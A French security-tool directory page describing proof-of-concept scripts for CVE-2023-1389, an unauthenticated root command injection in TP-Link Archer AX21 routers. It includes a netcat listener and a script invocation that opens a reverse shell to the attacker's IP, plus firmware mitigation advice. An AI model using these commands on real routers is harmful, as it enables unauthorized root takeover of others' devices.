Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-1389 — Scripts de preuve de concept pour CVE-2023-1389, une injection de commande non authentifiée dans le TP-Link Archer AX21, offrant des capacités de transfert de fichiers et de shell inversé. | Kitploit
Outils/GitHubGitHub/voyag3r-security/cve-2023-1389
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

Scripts de preuve de concept pour CVE-2023-1389, une injection de commande non authentifiée dans le TP-Link Archer AX21, offrant des capacités de transfert de fichiers et de shell inversé.

Voir le dépôt
1774il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description

La CVE-2023-1389 est une vulnérabilité d'injection de commandes non authentifiée dans le routeur WiFi TP-Link Archer AX21. Un callback dans le paramètre country utilise la fonction popen(), exécutée en tant que root, permettant à un attaquant d'injecter des valeurs arbitraires via des requêtes GET ou POST vers l'interface d'administration, sans nécessiter d'authentification. Plus de détails sur la vulnérabilité sont disponibles ici.

Voici quelques Proof-of-Concepts que j'ai créés en explorant l'injection de commandes. Archer-file-transfer.py était la première itération et est assez complexe dans la manière dont il réalise l'interaction. Archer-rev-shell.py vous donne un simple reverse shell netcat, et c'est probablement celui que vous recherchez. Si vous souhaitez en savoir plus sur le développement de ces scripts, vous pouvez lire l'article ici.

Utilisation

Dans une fenêtre de terminal :

root@kitploit:~
nc votre_IP port_ecoute

Dans une deuxième fenêtre de terminal :

root@kitploit:~
python3 archer-rev-shell.py -r routeur_IP -a votre_IP -p port_ecoute

Mitigation

TP-Link a publié la version du firmware 1.1.4 Build 20230219 qui corrige le problème en supprimant le callback vulnérable. La mise à jour de votre routeur vers le dernier firmware devrait protéger votre appareil.

Futur

Il est probable que je ne maintiendrai pas ces PoCs. Les deux sont assez simples et devraient être faciles à modifier selon les besoins.

Télécharger l’outil